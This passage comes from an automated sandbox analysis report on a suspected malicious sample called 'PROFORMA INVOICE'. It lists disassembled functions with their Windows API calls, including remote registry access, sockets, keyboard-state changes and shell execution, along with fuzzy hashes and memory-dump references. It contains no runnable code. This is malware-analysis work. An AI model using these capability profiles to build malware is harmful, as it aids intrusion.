Instruction Fuzzy Hash: C5C193B5D0421ADFDB00DF94C481BAEB7F4FF0A315F20846AE605E7281D739A949EB91

Function 00FA6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FA6B63
LoadStringW.USER32(00000000), ref: 00FA6B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FA6B80
LoadStringW.USER32(00000000), ref: 00FA6B87
_wprintf.LIBCMT ref: 00FA6BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FA6BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00FA6BA8

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 9aee0c011835cad34c28a84c79d62a774a55c8798c8fa9c7f8dbe18c2f818381
Instruction ID: 43013dae84198225e095b1ad40deed5d83995e798b4c275b727a1a2145b22914
Opcode Fuzzy Hash: 9aee0c011835cad34c28a84c79d62a774a55c8798c8fa9c7f8dbe18c2f818381
Instruction Fuzzy Hash: 630162F290024CBFEB11A7909DC9EF6326CE708304F004491BB45DA041EA749E849F70

Function 00FC2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FC2BB5,?,?), ref: 00FC3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FC2BF6

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: 79ab13fc8066c9c5521860e17cb8fbe961d84b2fdaa303c0bc5982934ea82c7c
Instruction ID: 52c564f8fb6f84a2cc14e299c68ebf7669a39e94d82b4a4d9e9d369902de862a
Opcode Fuzzy Hash: 79ab13fc8066c9c5521860e17cb8fbe961d84b2fdaa303c0bc5982934ea82c7c
Instruction Fuzzy Hash: 33915A716042019FCB01EF14CD92F6EB7E5EF98320F04885DF9969B291DB39E945EB42

Function 00FB961C Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 00FB9691
WSAGetLastError.WSOCK32(00000000), ref: 00FB969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00FB96C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00FB96E9
WSAGetLastError.WSOCK32(00000000), ref: 00FB96F8
inet_ntoa.WSOCK32(?), ref: 00FB9765
htons.WSOCK32(?,?,?,00000000,?), ref: 00FB97AA

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ErrorLast$htonsinet_ntoaselect
String ID:
API String ID: 500251541-0
Opcode ID: cda6267154b56338096473e5c429a56ba1985aa144a5d23d3b1cf34a1ef8f96c
Instruction ID: c7ff1cede443f9afe6a4a35ba0c891ff859df02007d7707fd432ad21cdeaad2c
Opcode Fuzzy Hash: cda6267154b56338096473e5c429a56ba1985aa144a5d23d3b1cf34a1ef8f96c
Instruction Fuzzy Hash: 6171EE31508240AFC310EF65CC81FABB7E9EF85710F104A1DF5959B2A1EB74D904EB92

Function 00F8A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 00F8A991

Part of subcall function 00F87D7C: __FF_MSGBANNER.LIBCMT ref: 00F87D91
Part of subcall function 00F87D7C: __NMSG_WRITE.LIBCMT ref: 00F87D98
Part of subcall function 00F87D7C: __malloc_crt.LIBCMT ref: 00F87DB8

__lock.LIBCMT ref: 00F8A9A4
__lock.LIBCMT ref: 00F8A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,01016DE0,00000018,00F95E7B,?,00000000,00000109), ref: 00F8AA0C
EnterCriticalSection.KERNEL32(8000000C,01016DE0,00000018,00F95E7B,?,00000000,00000109), ref: 00F8AA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 00F8AA39

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 2d5fde8caeee522768a7f686c757e4539ae0f58a88dd4d7ab2080736783f553a
Instruction ID: 4fc1ad997e0b3a36c90bbf028d6bcbd8bff7bb658fdf210aa6aadbc9c94c2acb
Opcode Fuzzy Hash: 2d5fde8caeee522768a7f686c757e4539ae0f58a88dd4d7ab2080736783f553a
Instruction Fuzzy Hash: BD412771E00705DBFB28BF68C9457D8B7A0EF01334F20821AE465AB6D1D7BD9941DB92

Function 00FC8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00FC8EE4
GetDC.USER32(00000000), ref: 00FC8EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FC8EF7
ReleaseDC.USER32(00000000,00000000), ref: 00FC8F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00FC8F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00FC8F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00FCBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00FC8F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00FC8FAA

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 9159d3a667780837e5b1f7c5426db0e155a19a17629cba2815648a83934de559
Instruction ID: 85506f03d9549484e58fbbfe4ca5c386084cfbb187bc19bbb0b0984a465d0656
Opcode Fuzzy Hash: 9159d3a667780837e5b1f7c5426db0e155a19a17629cba2815648a83934de559
Instruction Fuzzy Hash: 62317F72101254BFEF108F50CD8AFEA3BAEEF49765F084069FE089E191C6B59842DB74

Function 00FB16DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 00F6936C: __swprintf.LIBCMT ref: 00F693AB
Part of subcall function 00F6936C: __itow.LIBCMT ref: 00F693DF

Part of subcall function 00F7C6F4: _wcscpy.LIBCMT ref: 00F7C717

_wcstok.LIBCMT ref: 00FB184E
_wcscpy.LIBCMT ref: 00FB18DD
_memset.LIBCMT ref: 00FB1910

Strings

X, xrefs: 00FB1948

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: af131c2fa1c216da5a37b773b67ea47d079d0ad12b27fb61001255bc11da2263
Instruction ID: d9676160bf0e2d298cb9313d6c15771801ad86ac97cba1bca05c48a4304e376f
Opcode Fuzzy Hash: af131c2fa1c216da5a37b773b67ea47d079d0ad12b27fb61001255bc11da2263
Instruction Fuzzy Hash: A3C16F71A043419FC714EF24CC91AAAB7E4BF85350F40492DF8999B2A2DB34ED05EF82

Function 00FD0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F7B35F

GetSystemMetrics.USER32(0000000F), ref: 00FD016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00FD038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00FD03AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 00FD03D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00FD03FF
ShowWindow.USER32(00000003,00000000), ref: 00FD0421
DefDlgProcW.USER32(?,00000005,?,?), ref: 00FD0440

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: ccd8e596e1d641cfc08082c67047b902291457ac91d52be302be0e03792124c9
Instruction ID: ba3b32c7adde99c34dc4ed4ced3ea4902646435d37c9260d2eab44aee5f73efc
Opcode Fuzzy Hash: ccd8e596e1d641cfc08082c67047b902291457ac91d52be302be0e03792124c9
Instruction Fuzzy Hash: D8A1B235A00616EFDB18CF68C9897BDBBB2BF08711F188116EC54AB354DB74AD50EB90

Function 00F7AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fd0280b7ef1bbb169e9d9e21f8ddbdcd8a6938f4e60efb9589515c21d928e85
Instruction ID: 4bd0e434b4c51e318ce0ee8cbabbc7697a3d228e93a942af237f4be7a60e469a
Opcode Fuzzy Hash: 9fd0280b7ef1bbb169e9d9e21f8ddbdcd8a6938f4e60efb9589515c21d928e85
Instruction Fuzzy Hash: 9F715BB1900109AFCB14DF98CC89AEEBB75FF85314F14C14AF919AA251C734AA51EB62

Function 00FC2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FC225A
_memset.LIBCMT ref: 00FC2323
ShellExecuteExW.SHELL32(?), ref: 00FC2368

Part of subcall function 00F6936C: __swprintf.LIBCMT ref: 00F693AB
Part of subcall function 00F6936C: __itow.LIBCMT ref: 00F693DF

Part of subcall function 00F7C6F4: _wcscpy.LIBCMT ref: 00F7C717

CloseHandle.KERNEL32(00000000), ref: 00FC242F
FreeLibrary.KERNEL32(00000000), ref: 00FC243E

Strings

@, xrefs: 00FC2334

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: 26e12e3c66514e63ae22b3960b29484dce35b363d1c8a88af9309d0d663025ac
Instruction ID: 5e2e30a0e7662f3941b9051a8c4265a0b25a98c7992f52e1dfaa7ec53013bfd9
Opcode Fuzzy Hash: 26e12e3c66514e63ae22b3960b29484dce35b363d1c8a88af9309d0d663025ac
Instruction Fuzzy Hash: 51716E75A0061ADFCF05EFA4C982A9EB7F5FF48310F108459E859AB351CB38AD40EB95

Function 00FA3DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00FA3DE7
GetKeyboardState.USER32(?), ref: 00FA3DFC
SetKeyboardState.USER32(?), ref: 00FA3E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 00FA3E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 00FA3EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 00FA3EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FA3F13

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: b8cea16cd552aad88c9e6c5612580f25b0aeb4c9625f99a58cb6d3f1e4ec5c01
Instruction ID: 77e865f5f73cb6f200d6dde120caf190411d1c810ce78dc4e7a554e4293763d9
Opcode Fuzzy Hash: b8cea16cd552aad88c9e6c5612580f25b0aeb4c9625f99a58cb6d3f1e4ec5c01
Instruction Fuzzy Hash: 0151A1E0A147D53DFB3647288C85BB67EA95B07314F084589F1D54A8C2D3A9AEC8F760

Function 00FA3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00FA3C02
GetKeyboardState.USER32(?), ref: 00FA3C17
SetKeyboardState.USER32(?), ref: 00FA3C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FA3CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FA3CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FA3D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FA3D26

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 5876d6a54f7d8a7a099db8b875912857d89b8c522f478b4cc84d640845ffe9ec
Instruction ID: d3d5ad770e74dd2b55669569ddcc6aaca374497a9266c6c7696b30ceb4b0ea7b
Opcode Fuzzy Hash: 5876d6a54f7d8a7a099db8b875912857d89b8c522f478b4cc84d640845ffe9ec
Instruction Fuzzy Hash: 3251E4E09047D97DFB3283248C46BB6BFA96F47320F088489F0D55A8C2D294EE84F760

Function 00FA7DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00FA7DBE
_wcsncpy.LIBCMT ref: 00FA7DF3
_wcsncpy.LIBCMT ref: 00FA7E25
_wcsncpy.LIBCMT ref: 00FA7E58
_wcsncpy.LIBCMT ref: 00FA7E9A
_wcsncpy.LIBCMT ref: 00FA7ED4
_wcsncpy.LIBCMT ref: 00FA7F03

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: ec2dfa15b2221cc7e279aadef8e2133447436af57821705e703be2b45c9e3fb0
Instruction ID: 49a6e88d0c93b86164096de4030427e6126aacf80b8c8a8ed4bff43f15c38358
Opcode Fuzzy Hash: ec2dfa15b2221cc7e279aadef8e2133447436af57821705e703be2b45c9e3fb0
Instruction Fuzzy Hash: DB415E66D14314BADB50FBF4CC869CFB7ACAF06310F508966E905E3121FA38E61593E5

Function 00F7B63C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 00F7B64F
ScreenToClient.USER32(00000000,000000FF), ref: 00F7B66C
GetAsyncKeyState.USER32(00000001), ref: 00F7B691
GetAsyncKeyState.USER32(00000002), ref: 00F7B69F

Strings

mmmmmm, xrefs: 00FDDFDC

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID: mmmmmm
API String ID: 4210589936-236548473
Opcode ID: 37e25df32a468a6f5bec36985d442a2aa1231606c4cca2f90c70de29d3ae78c0
Instruction ID: b02998cb9809a4e01572a58f8878cb48274eaec1709c70321fcbc98fd7f6d0ba
Opcode Fuzzy Hash: 37e25df32a468a6f5bec36985d442a2aa1231606c4cca2f90c70de29d3ae78c0
Instruction Fuzzy Hash: 7A418D35904109BFCF159F64CC48BE9BBB5FB05324F24835BE82996290CB30A994FFA1

Function 00FC3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00FC3DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FC3DCB
FreeLibrary.KERNEL32(00000000), ref: 00FC3E80

Part of subcall function 00FC3D72: RegCloseKey.ADVAPI32(?), ref: 00FC3DE8
Part of subcall function 00FC3D72: FreeLibrary.KERNEL32(?), ref: 00FC3E3A
Part of subcall function 00FC3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00FC3E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 00FC3E25

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 5c99060968094001d9e6c30afe1561632868b2299a3f56f20c56cf04ad5e5851
Instruction ID: 3b56c6a34a3ba7d6a47fa4c21ebe1c087d16f3edf50103f448ab75a1741e74ea
Opcode Fuzzy Hash: 5c99060968094001d9e6c30afe1561632868b2299a3f56f20c56cf04ad5e5851
Instruction Fuzzy Hash: 41310DB1D0110ABFDB159B94DD86EFFB7BCEF08350F00416AE512A6150D6749F49ABA0

Function 00FC8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00FC8FE7
GetWindowLongW.USER32(015A1EC0,000000F0), ref: 00FC901A
GetWindowLongW.USER32(015A1EC0,000000F0), ref: 00FC904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00FC9081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00FC90AB
GetWindowLongW.USER32(00000000,000000F0), ref: 00FC90BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FC90D6

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: a81f70a59c97be04c66874b34da3f63925205f4b9c034d2d333a2e854b74d63b
Instruction ID: 8b078e11bba45af975a05613e1849e215e40a531341ca07477526c1d5cd22727
Opcode Fuzzy Hash: a81f70a59c97be04c66874b34da3f63925205f4b9c034d2d333a2e854b74d63b
Instruction Fuzzy Hash: 7E313C35A8411ADFDB30CF68DD8AF5437A6FB49724F140168F5558F2A1CBB2AC40EB41

Function 00FA08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FA08F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FA0918
SysAllocString.OLEAUT32(00000000), ref: 00FA091B
SysAllocString.OLEAUT32(?), ref: 00FA0939
SysFreeString.OLEAUT32(?), ref: 00FA0942
StringFromGUID2.OLE32(?,?,00000028), ref: 00FA0967
SysAllocString.OLEAUT32(?), ref: 00FA0975

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: afb7fa1706c6b2cde65f0cde8bad95d3272aa5026c9c7b9f87643d7017f3c04f
Instruction ID: f46aa156d1dad9ce831f88cd394912dff38137c0b3568d29a2c8529b6918d86f
Opcode Fuzzy Hash: afb7fa1706c6b2cde65f0cde8bad95d3272aa5026c9c7b9f87643d7017f3c04f
Instruction Fuzzy Hash: 32219776601219AFAB10DF68DC84DAB73BCEB0D370B048125F919DB251DA74EC45D760

